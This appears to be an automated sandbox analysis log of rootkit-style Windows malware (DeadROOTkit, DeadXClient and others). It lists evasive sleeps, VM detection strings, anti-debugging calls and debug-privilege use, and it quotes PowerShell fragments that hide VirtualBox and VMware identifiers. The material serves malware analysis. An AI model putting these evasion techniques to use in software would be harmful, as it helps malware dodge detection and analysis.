Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 10A0000 memory reserve | memory write watch
Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 1AE80000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\DeadXClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 600000
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599875
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599765
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599640
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599531
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599421
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599293
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599133
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 598741
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 598568
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 598440
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Deadsvchost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Deadsvchost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\DeadXClient.exe Window / User API: threadDelayed 6514
Source: C:\Users\Public\DeadXClient.exe Window / User API: threadDelayed 3143
Source: C:\Users\Public\DeadROOTkit.exe Window / User API: threadDelayed 3804
Source: C:\Users\Public\DeadROOTkit.exe Window / User API: threadDelayed 5987
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3822
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8065
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1186
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 8849
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 1151
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 9914
Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9863
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9353
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\Public\DeadCodeRootKit.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\lsass.exe API coverage: 7.3 %
Source: C:\Windows\System32\svchost.exe API coverage: 5.6 %
Source: C:\Windows\System32\svchost.exe API coverage: 5.5 %
Source: C:\Windows\System32\svchost.exe API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe API coverage: 5.6 %
Source: C:\Users\user\Desktop\mIURiU8n2P.exe TID: 5164 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\DeadXClient.exe TID: 7384 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\Public\DeadXClient.exe TID: 7396 Thread sleep count: 6514 > 30
Source: C:\Users\Public\DeadXClient.exe TID: 7396 Thread sleep count: 3143 > 30
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -36893488147419080s >= -30000s
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599875s >= -30000s
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599765s >= -30000s
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599640s >= -30000s
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599531s >= -30000s
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599421s >= -30000s
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599293s >= -30000s
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599133s >= -30000s
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -598741s >= -30000s
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -598568s >= -30000s
Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -598440s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5680 Thread sleep count: 3822 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5680 Thread sleep count: 5329 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 7356 Thread sleep count: 340 > 30
Source: C:\Windows\System32\dllhost.exe TID: 7356 Thread sleep time: -34000s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 6920 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7420 Thread sleep count: 8849 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7420 Thread sleep time: -8849000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7420 Thread sleep count: 1151 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7420 Thread sleep time: -1151000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7476 Thread sleep count: 9914 > 30
Source: C:\Windows\System32\lsass.exe TID: 7476 Thread sleep time: -9914000s >= -30000s
Source: C:\Users\Public\Deadsvchost.exe TID: 7484 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7552 Thread sleep count: 241 > 30
Source: C:\Windows\System32\svchost.exe TID: 7552 Thread sleep time: -241000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7600 Thread sleep count: 9863 > 30
Source: C:\Windows\System32\dwm.exe TID: 7600 Thread sleep time: -9863000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7644 Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 7644 Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7664 Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 7664 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7672 Thread sleep count: 252 > 30
Source: C:\Windows\System32\svchost.exe TID: 7672 Thread sleep time: -252000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7680 Thread sleep count: 247 > 30
Source: C:\Windows\System32\svchost.exe TID: 7680 Thread sleep time: -247000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7696 Thread sleep count: 201 > 30
Source: C:\Windows\System32\svchost.exe TID: 7696 Thread sleep time: -201000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7776 Thread sleep count: 80 > 30
Source: C:\Windows\System32\svchost.exe TID: 7776 Thread sleep time: -80000s >= -30000s
Source: C:\Users\Public\Deadsvchost.exe TID: 7720 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7796 Thread sleep count: 82 > 30
Source: C:\Windows\System32\svchost.exe TID: 7796 Thread sleep time: -82000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7828 Thread sleep count: 238 > 30
Source: C:\Windows\System32\svchost.exe TID: 7828 Thread sleep time: -238000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7864 Thread sleep count: 69 > 30
Source: C:\Windows\System32\svchost.exe TID: 7864 Thread sleep time: -69000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7988 Thread sleep count: 243 > 30
Source: C:\Windows\System32\svchost.exe TID: 7988 Thread sleep time: -243000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8004 Thread sleep count: 247 > 30
Source: C:\Windows\System32\svchost.exe TID: 8004 Thread sleep time: -247000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8020 Thread sleep count: 243 > 30
Source: C:\Windows\System32\svchost.exe TID: 8020 Thread sleep time: -243000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8096 Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 8096 Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8104 Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 8104 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8128 Thread sleep count: 62 > 30
Source: C:\Windows\System32\svchost.exe TID: 8128 Thread sleep time: -62000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8160 Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 8160 Thread sleep time: -250000s >= -30000s
Source: C:\Users\Public\Deadsvchost.exe TID: 8152 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8180 Thread sleep count: 244 > 30
Source: C:\Windows\System32\svchost.exe TID: 8180 Thread sleep time: -244000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8188 Thread sleep count: 226 > 30
Source: C:\Windows\System32\svchost.exe TID: 8188 Thread sleep time: -226000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7264 Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 7264 Thread sleep time: -248000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7248 Thread sleep count: 237 > 30
Source: C:\Windows\System32\svchost.exe TID: 7248 Thread sleep time: -237000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7308 Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 7308 Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6804 Thread sleep count: 52 > 30
Source: C:\Windows\System32\svchost.exe TID: 6804 Thread sleep time: -52000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5820 Thread sleep count: 53 > 30
Source: C:\Windows\System32\svchost.exe TID: 5820 Thread sleep time: -53000s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 6096 Thread sleep count: 185 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 6096 Thread sleep time: -185000s >= -30000s
Source: C:\Users\Public\DeadROOTkit.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed
Source: C:\Users\Public\DeadXClient.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\DeadROOTkit.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Deadsvchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A09BF5C FindFirstFileExW, 6_2_000002E86A09BF5C
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC64BF5C FindFirstFileExW, 11_2_00000225DC64BF5C
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AEBF5C FindFirstFileExW, 12_2_00000202C0AEBF5C
Source: C:\Windows\System32\svchost.exe Code function: 14_2_000002A66130BF5C FindFirstFileExW, 14_2_000002A66130BF5C
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF21BF5C FindFirstFileExW, 16_2_000002BAAF21BF5C
Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000026A879CBF5C FindFirstFileExW, 17_2_0000026A879CBF5C
Source: C:\Windows\System32\svchost.exe Code function: 19_2_00000179537ABF5C FindFirstFileExW, 19_2_00000179537ABF5C
Source: C:\Windows\System32\svchost.exe Code function: 20_2_000002295D56BF5C FindFirstFileExW, 20_2_000002295D56BF5C
Source: lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000016.00000002.3003322071.000001845BC0A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: DeadXClient.exe, 00000001.00000002.3027772809.000000001B950000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpe="%SystemRoot%\system32\mswsock.dll Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 00000010.00000002.3015392657.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: svchost.exe, 00000019.00000003.1884989548.000001D5593A4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 0000002E.00000000.1971368837.000002644A702000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: svchost.exe, 0000002E.00000000.1971007681.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.25.dr Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: DeadROOTkit.exe, 00000002.00000002.2999435722.000000001B1C0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2947445090.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763056883.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2944371275.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.1779615451.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1828161569.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2938538248.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1830040806.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2938017743.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1834191940.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2955372559.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 0000000E.00000000.1779646224.000002A66062A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.25.dr Binary or memory string: VMCI: Using capabilities (0x1c).
Source: lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.dr Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
Source: DeadROOTkit.exe.2.dr Binary or memory string: vmware
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000019.00000000.1856908849.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2952389964.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000002E.00000000.1971175317.000002644A640000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000.ifo
Source: svchost.exe, 0000002E.00000000.1971007681.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &@\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000019.00000002.2953316253.000001D558643000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@vmcitpA
Source: svchost.exe, 0000000E.00000002.2949507615.000002A66066B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000024.00000002.2936162051.0000023FD3802000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 00000019.00000000.1858871917.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dowvmci
Source: Microsoft-Windows-Ntfs%4Operational.evtx.25.dr Binary or memory string: VMware
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.25.dr Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.dr Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: DeadXClient.exe, 00000001.00000002.2920271280.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.dr Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
Source: dwm.exe, 00000010.00000002.3015392657.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.dr Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\DeadROOTkit.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B8078C1 CheckRemoteDebuggerPresent, 2_2_00007FFD9B8078C1
Source: C:\Users\Public\DeadROOTkit.exe Process queried: DebugPort
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A0981B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_000002E86A0981B0
Source: C:\Users\Public\DeadCodeRootKit.exe Code function: 3_2_00B019E2 StrCatW,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,StrStrIW,StrCatW,StrStrIW,StrNCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrNCatW,StrCatW,StrCatW,StrCatW,StrStrIW,StrCatW,StrCpyW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,RtlFreeHeap, 3_2_00B019E2
Source: C:\Users\Public\DeadXClient.exe Process token adjusted: Debug
Source: C:\Users\Public\DeadROOTkit.exe Process token adjusted: Debug
Source: C:\Users\Public\DeadROOTkit.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\Public\Deadsvchost.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A098518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_000002E86A098518
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A0981B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_000002E86A0981B0
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A09B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_000002E86A09B62C
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC6481B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00000225DC6481B0
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC64B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00000225DC64B62C
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC648518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00000225DC648518
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AEB62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00000202C0AEB62C
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AE81B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00000202C0AE81B0
